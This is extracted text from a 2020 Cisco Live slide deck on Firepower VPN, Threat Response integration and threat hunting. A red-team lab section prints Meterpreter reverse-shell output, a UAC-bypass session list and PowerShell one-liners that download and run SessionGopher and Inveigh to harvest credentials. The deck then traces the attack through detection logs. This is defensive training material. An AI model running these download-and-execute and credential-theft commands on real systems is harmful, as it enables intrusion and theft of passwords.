TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 651
Username for Secondary Authentication
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 652
For Your
LDAPS as a Realm Reference
Encryption: LDAPS,
“Test”
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 653
For Your
FTD DNS Configuration Reference
LDAPS
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 656
RA VPN with
Certificate and
Duo MFA
RAVPN with Certificate
and Duo MFA
Duo Cloud
Duo RADIUS
Proxy
RADIUS
FTD
VPN On premise
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 659
Certificate Based Authentication with Duo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 660
Duo RADIUS Proxy – Duo Only Client
A Standalone Duo Software Acting as a RADIUS Server
radius_ip_1=198.19.10.1
radius_secret_1=C1sco12345 FTD as a RADIUS client
failmode=safe
client=duo_only_client
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 661
FTD RA VPN with
Certificate and
Duo MFA Demo
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 664
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 665
Monitoring of RA
VPN Connections
Monitoring of RA VPN Connections
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 667
Troubleshooting
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 672
RA VPN Summary
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 673
Threat Hunting
Part I
“The only true wisdom is in knowing
you know nothing” - Socrates
• Where to start?
• Which tool(s) to use?
• What information needed?
• How to connect the dots?
• Today’s Tools
• Firepower Threat Defense (IPS, AMP)
• Threat Grid
• AMP for Endpoints
• Email Security
• Threat Response
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 675
Threats are becoming more complex...
Understanding what happened requires stitching information together
SecOps
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 676
Introducing Cisco Threat Response (CTR)
Unleashing the power of the Cisco Integrated Security Architecture
Firepower
You’re entitled to Threat AMP for Threat Email Stealth
Umbrella Threat
Response if you own Endpoints Grid Security watch
Defense
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Cisco Threat Response in action
Three simple ways to get started
Manual or
1 Intelligence Sources
Investigate
(search interface)
Casebook via Browser
2 Plug-In
Observables:
Firepower
• File hash AMP for Email Stealth Cisco Umbrella Threat Virus
Umbrella Threat
• IP address Endpoints Security watch Talos Investigate Grid Total
• Domain Defense
• URL • Have we seen these observables? Where? • Are these observables suspicious or
• Email • Which endpoints connected to the domain/URL? malicious?
• Etc.
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 678
Integrating FTD and Cisco Threat Response
• Send supported events from FTD devices to CTR for analysis alongside data from
your other products and other sources
• Regional Clouds
• North America
• Europe
• Asia (APJC) -> Firepower integration is not currently supported
Feature Managed by FMC Managed by FDM
6.3 and later (via syslog) 6.3 and later (via syslog)
Intrusion (IPS) events
6.4 and later (via direct connection) 6.4 and later (via direct connection)
Connection events (all) Not supported 6.5
Connection events (high priority only)
Security Intelligence connection events
Connection events related to file and malware events
6.5 Not supported
Connection events related to intrusion events
• Beginning in Firepower release 6.3, you can use syslog to send supported events to
the Cisco cloud
• Set up an on-premises Cisco Security Services Proxy (CSSP) server and configure
your devices to send syslog messages to this proxy
On Premise Cloud
API
syslog Cisco Security https Security Services Threat
NGFW (SSE)
Services Proxy Exchange Response
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 680
Send Events to the Cloud directly
• Beginning in Firepower release 6.4, you can configure your Firepower system to
send supported events directly to the Cisco cloud
• Firepower devices send events directly to Security Services Exchange
On Premise Cloud
API
https Security Services Threat
NGFW (SSE)
Registers to SSE as a Exchange Response
Device, by the way of
Cisco Smart Licensing • Automatically or • Promoted Incidents
• FTD 6.4 & 6.5
unit that have manually promote appears in CTR
direct Internet Incidents
connectivity
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 683
One Step to Send Events directly
• IPS, File, Malware and High Priority Connections Events transmitted to regional cloud
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 685
Start with an IPS Event
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 687
Do we already know more?
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 688
go down the rabbit hole
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 690
…gain more insights
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 691
…gain more insights
• powershell.exe executed
„openme.com“ as command
• C:\Users\Alexa\Downloads\Urgent\openMe.
com -A -w1000 31.210.117.131 1666 GET
/ HTTP/1.1
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 692
…gain more insights
• powershell.exe executed
„openme.com“ as command
• C:\Users\Alexa\Downloads\Urgent\openMe.
com -A -w1000 31.210.117.131 1666 GET
/ HTTP/1.1
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 693
…gain more insights
• powershell.exe executed
„openme.com“ as command
• C:\Users\Alexa\Downloads\Urgent\openMe.
com -A -w1000 31.210.117.131 1666 GET
/ HTTP/1.1
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 694
Find the Origin
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 696
Did we solved the riddle?
❓❓❓
• Started with an IPS – CNC Event to a malicious IP
❓❓
• Endpoint „ALEXA-WIN10“ was identified as Source ❓
• IPS Event was triggerd by an unkown File „openme.com“
• Explorer.exe started Powershell with a Script, which executed „openme.com“
• Email with „openme.com“ as Attachment was sent to „Alex“ corporate email address
• Email was Dropped by Content Filter „Sender Domain Reputation Filtering“
next steps…
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 697
Remediation
👾→ ✅
Take Response actions with Threat Response
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 699
Isolate the Endpoint with a single “click”
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 700
Block incoming and outgoing network activity
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 701
TALOS Incident Response Services
• Emergency response
• For incidents such as a data breaches or ransomware, we quickly address the most pressing concerns. We
build a plan to isolate the attacker, scope out and contain the situation, identify the root cause, and design
strategies to remedy the underlying issues
• Retainer
• With your retainer, our team is available even before an incident, with proactive services to strengthen your
security posture. If you do require emergency assistance, our responders are available within hours to begin
work virtually before they travel onsite.
• Proactive services
• Don't wait for an incident to occur to take action: Identify vulnerabilities before they impact your organization.
Our responders will work with your team to hunt for and address existing adversaries within your network.
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 702
and the Story continues…
For Your
There was an additional Unkown File Hash Reference
8ec4b6188a91ad6828e883ed3be9fa5f461d38fcf896f4641833965d1b8b968b
🔎
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 704
For Your
and the Story continues… Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 705
Threat Hunting
Part II
Talk To The „Red Team” And Learn From Them!
Offensive Defensive
Security Security
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 707
Who Is Who In Our Story
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 708
For Your
Mapping to Cyber Kill Chain Reference
ask the
user nicely
to click on
it Firewall
• payload off sessiongoph
• c&c Email the Privilege Backdoor er
server payload! escalation add user schtasks responder
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 709
Firepower
Integrations
FMC & FTD APIs And Integration Points
https://www.cisco.com/c/m/en_us/products/security/technical-alliance-partners.html
Threat Intelligence Director
• ThreatQ
• Hail a taxii
• Anomali SIEM
• Qualys • Insight
• Rapid 7 • Seclytics • IBM Qradar
• Tenable • NC4 • Splunk
• Greenbone • LogRhythm
• McAfee
• LogZilla
host input TID eStreamer • Arcsight
FMC
DB access Rest API
Security and Policy Orchestration
• Tufin
Host and event database
• Firemon
• Panaseer
• Algosec
• MicroFocus (Arcsight) API
• Firesec
• Crystal Report FTD • Ansible
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 712
FMC Configuration
eStreamer
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 714
FMC Configuration
System → Integration → eStreamer
2. Pick any
1. Select an events password, just
remember it
3. Hostname/IP of
the eStreamer client
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 715
FMC Configuration
System → Integration → eStreamer
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 716
Splunk Installation
Cisco Firepower APP for Splunk
Detailed configuration
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 718
Firepower APP for
Splunk
For Your
Search for “Cisco Firepower App for Splunk” Reference
Install it
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 728
For Your
Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 731
For Your
Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 732
For Your
IPS Events Summary Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 733
For Your
Scroll Down For The IPS Events Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 734
For Your
Raw IPS Event Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 735
I Need To Find
Only One
Vulnerability…
Find a Popular Application
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 737
Modify putty.exe, Just A Little Bit
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 738
No Match On Virustotal
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 739
...nor In The Talos Database
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 740
On the Attacker Machine
• a simple configuration file
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 741
Send The File Via Email
Spoofing the sender
Multiple
recipients
Attachment
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 742
Victim Opens The Mail
Cisco ESA – subject prepended
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 743
...Saves Attachment To The Desktop
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 744
...And Finally Clicks On It And Connects To
Some Server
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 745
Reverse Shell Arrived
Victim’s IP
Active sessions
=============== PC/username
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows client34-PC\client34 @ CLIENT34-PC 192.168.77.77:4444 ->
192.168.34.34:50828 (192.168.34.34)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 746
Let’s See Where We Have Landed
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 747
List The Items On The Desktop
meterpreter > shell
Process 2504 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
C:\Users\client34\Desktop>
Directory of C:\Users\client34\Desktop
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 748
Turn Off The Windows Firewall
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 749
Process Migration
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
2436 1296 notepad.exe x86 1 client34-PC\client34 C:\Windows\SysWOW64\notepad.exe
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 750
Privilege escalation
meterpreter > getuid
Server username: client34-PC\client34 1. Before
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 752
Schedule A Powershell Script To Run
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 753
Persistence Connection
Port to connect
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 754
All Three “metepreter” Sessions
meterpreter > background S[*] Backgrounding session 2...
msf5 exploit(windows/local/bypassuac) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows client34-PC\client34 @ CLIENT34-
PC 192.168.77.77:4444 -> 192.168.34.34:50849
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 755
Yet Another „Persistent Connection”
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 756
The Good Old “mimikatz”
No touch on the disk, directly to the memory
As good as password
Password
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 757
Let’s Find The Next Victim
PowerShell script downloaded from the internet
C:\Windows\system32>Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/fireeye/SessionGopher/m
aster/SessionGopher.ps1'); Invoke-SessionGopher
Digging for saved RDP sessions Digging for saved WinSCP sessions
Source : client34-PC\client34
Session : [email protected]
Hostname : mrbrown.budlab.net
Username : mrbrown
Password : rainbow
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 758
Or Simply Ask For The Password
C:\Windows\system32>Powershell.exe -NoP -Exec Bypass IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-
Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -HTTP Y -HTTPS Y
-mDNS Y -NBNS Y -Proxy Y -WPADAuth Basic -HTTPAuth Basic
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 759
Once You Are In,
I need Just One
IOC To Catch You!
If You Had Watched the Live Mail Logs…
Cisco Email Security Appliance “mail_logs” highly unlikely
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 761
Investigation Can Be Triggered On Events - 1
Retrospective alert from Cisco ESA
From: IronPort C000V Alert <[email protected]>
To: [email protected]
Subject: Info <AMP> mail.budlab.net:AMP Retrospective Alert:puttyLIVE.exe attachment
verdict changed from VERDICT UNKNOWN to MALICIOUS
Disposition change
The Info message is:
Retrospective verdict received for puttyLIVE.exe. File name and hash
SHA256: b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38
Timestamp: 2020-01-12T00:44:35Z
Verdict: MALICIOUS
Spyname: W32.B8FE425AD0-95.SBX.TG
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 762
Cisco Email Security Appliance AMP log
mail.budlab.net> grep 39803 amp
Unknown file at 23:15
Sat Jan 11 23:15:21 2020 Info: File reputation query initiating. File Name
= 'puttyLIVE.exe', MID = 39803, File Size = 1425408 bytes, File Type =
application
Disposition has changed at 23:22
Sat Jan 11 23:15:22 2020 Info: Response received for file reputation
query from Cloud. File Name = 'puttyLIVE.exe', MID = 39803, Disposition =
FILE UNKNOWN, Malware = None, Analysis Score = 0, sha256 =
b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38,
upload_action = Recommended to send the file for analysis
Sat Jan 11 23:22:22 2020 Info: File analysis complete. MID: 39803,
SHA256: b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38,
File name: puttyLIVE.exe, Submit Timestamp: 1578780925, Update Timestamp:
1578781342, Disposition: 3, Score: 95, Analysis Id:
'37a07d92b2ea9b08906f9a580df1b5e2', Details: W32.B8FE425AD0-95.SBX.TG
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 763
Advanced Malware Protection - ESA
Retrospective Verdict Updates
Disposition changed
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 764
ThreatGrid Dynamic Sandbox Analysis
Part I – Summary Of All Indicators
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 765
ThreatGrid Dynamic Sandbox Analysis
Part II – Backdoor Connections + Machine Learning Model Indicators
Backdoor connections
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 766
ThreatGrid Dynamic Sandbox Analysis
Part III – Further Suspicious Indicators
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 767
Investigation Can Be Triggered On Events - 2
Firepower Host Profile
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 768
Malware Event Details
Information From The Integrated AMP For Endpoints (AMP4E)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 769
Intrusion Events for “192.168.34.34 – client34”
Snort rule ID (click for details) Port 4444 (initial), 5555 (privileged) and 6666 (persistence)
Attacker Victim
Ports
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 773
Raw Log In Splunk
Process Level Information From AnyConnect NVZ Module
New Search
da="192.168.77.77" 4444
Source address Process hash Destination address
Process name Dst port
Jan 11 23:59:12 127.0.0.1 Jan 11 23:59:12 splunk.budlab.net
fv="nvzFlow_v3" pr="6" sa="192.168.34.34" sp="50849" da="192.168.77.77"
dp="4444" fss="1578782333" fst="Sat Jan 11 23:38:53 2020"
fes="1578783598" fet="Sat Jan 11 23:59:58 2020"
udid="612296565E6F2BBE27230AB731334DE84D9B7CA9" liuid="''" liuat="0"
pa="client34-PC\client34" paa="client34-PC" pap="client34" puat="2"
pn="puttylive.exe"
ph="B8FE425AD09DE7664FD5391BF72D6E61BF41D8AAC7CA594D4F0FF9DEC2F53B38"
ppa="client34-PC\client34" ppuat="2" ppn="explorer.exe"
pph="6A671B92A69755DE6FD063FCBE4BA926D83B49F78C42DBAEED8CDB6BBC57576A"
ibc="419698" obc="10679" ds="''" dh="Unknown" iid="2" mnl="''" mhl="''"
liuidp="unknown"
Parent process hash Parent process name
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 774
Pivot From Splunk Console To Threat Response
With Browser Plugin
Right click on the hash
Notepad launched
Pivot to Stealthwatch
Stealthwatch Alarm
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 777
Stealthwatch Host Report
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 778
Investigation Can Be Triggered On Events - 4
Events for ”client34” in AMP For Endpoint Process level relations
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 779
Device Trajectory in AMP 4 Endpoint
Process Relations
Initial backdoor
connection
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 780
Continue with Device Trajectory…
UAC bypass
priv escalation
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 781
Continue with Device Trajectory…
Elevated session
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 782
Summary
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 790
Closing – Wrap Up
Thank you!!!
• Speakers
• Sven Kutzer (CDO, FDM, Migration, Backup and Restore, AMP, Threat Hunting Part I)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 792
For Your
Related Sessions Reference
Breakout sessions
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 794
SBG’s User Experience
(UX) team is running
collaborative Design
Thinking Sessions at
Cisco Live!
Your ideas →
Sharpies + Inner Picasso →
Product Improvements!
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco
Confidential
Do you:
use our NextGen Firewall 1
product(s)?
Come talk to Security User Don’t have time at Cisco Live? Join our UX
Experience (UX) Team!! participant database and we’ll be in touch
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco
to showcase upcoming features and get
Confidential
your feedback! Signup using QR code 2.
Complete your
online session
survey • Please complete your session survey
after each session. Your feedback
is very important.
• Complete a minimum of 4 session
surveys and the Overall Conference
survey (starting on Thursday) to
receive your Cisco Live t-shirt.
• All surveys can be taken in the Cisco Events
Mobile App or by logging in to the Content
Catalog on ciscolive.com/emea.
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 797
Continue your education
Demos in the
Walk-In Labs
Cisco Showcase
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 798
Thank you